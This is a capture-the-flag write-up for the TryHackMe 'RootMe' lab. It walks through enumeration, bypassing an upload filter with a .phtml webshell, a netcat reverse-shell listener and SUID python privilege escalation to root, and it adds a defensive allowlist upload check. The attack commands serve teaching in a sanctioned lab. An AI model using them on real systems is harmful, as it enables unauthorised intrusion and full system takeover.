
TryHackMe: RootMe

CTF Web PHP SUID PrivEsc

In this THM machine, the attacker must enumerate the target, perform reconnaissance, upload a webshell through a poorly secured web form, and then escalate privileges from user to root.

Enumeration

First, enumeration of the domain is performed using dirb/gobuster and nmap.

Nmap returns two results:

  • Port 22: SSH
  • Port 80: Apache server

Dirb yields interesting results:

  • /panel
  • /uploads

Foothold - PHP Webshell

The webpage at /panel appears to be a form with an upload button. Since the site is running Apache, we can attempt to upload a PHP webshell.

Bypass File Extension Filter

The server filters uploads by file extension. Attempts:

  • URL-encoded null byte - didn't work
  • Saving as .phtml - success!
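The filter on the box is not shown, so the denylist below is an assumption; the example is added here and is not the machine's code. It places the weak denylist check beside an allowlist check that rejects both attempts listed above:

```python
import os
import re

# Assumed denylist of the weak filter (constructed): only a bare .php is blocked.
DENYLIST = {".php"}

# Extensions the hardened endpoint accepts (constructed: images only).
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}


def denylist_check(filename: str) -> bool:
    """Weak check: looks only at the final extension and rejects denylisted ones.
    .phtml is not on the list, so it passes; a name with an embedded %00 also
    passes because the check never inspects the rest of the name."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENYLIST


def allowlist_check(filename: str) -> bool:
    """Hardened check: the whole name must be <base>.<ext> with ext allowlisted.
    Rejects null bytes (raw or URL-encoded), path separators and double
    extensions such as shell.php.png, instead of enumerating bad extensions."""
    if not filename or "\x00" in filename or "%00" in filename:
        return False
    if "/" in filename or "\\" in filename:
        return False
    # Exactly one dot; base restricted to a safe character set.
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", filename)
    if not m:
        return False
    return "." + m.group(1).lower() in ALLOWLIST
```

The extension check is only one layer: the upload directory should also have PHP execution disabled (for Apache with mod_php, `php_admin_flag engine off` or `RemoveHandler` for the relevant extensions in that directory) so a file that slips through is served, not executed.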

Start a netcat listener and request the uploaded file via the /uploads directory:

nc -lvnp 4444

A shell as the web user came back to the netcat listener. Find the user flag:

find . -type f -iname 'user.txt'

Privilege Escalation - SUID

The objective is to obtain root via SUID privilege escalation.

Find SUID binaries:

find / -user root -perm /4000 2>/dev/null
# or
find . -perm /4000 2>/dev/null

Note: 4000 is the SUID bit in octal mode notation; -perm /4000 matches any file with that bit set. The 2>/dev/null suppresses permission-denied noise from directories the current user cannot read.

This search returned many results, but one binary stood out: python

Python SUID Exploitation

GTFOBins lists a SUID privilege escalation for Python:

cd /usr/bin/

# -p makes sh keep the effective UID granted by the SUID bit instead of dropping it
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

whoami
# root

After running this command, the escalation was successful and root access was obtained.

Find root flag:

# search from / rather than the current directory (/usr/bin after the cd above)
find / -iname 'root.txt' 2>/dev/null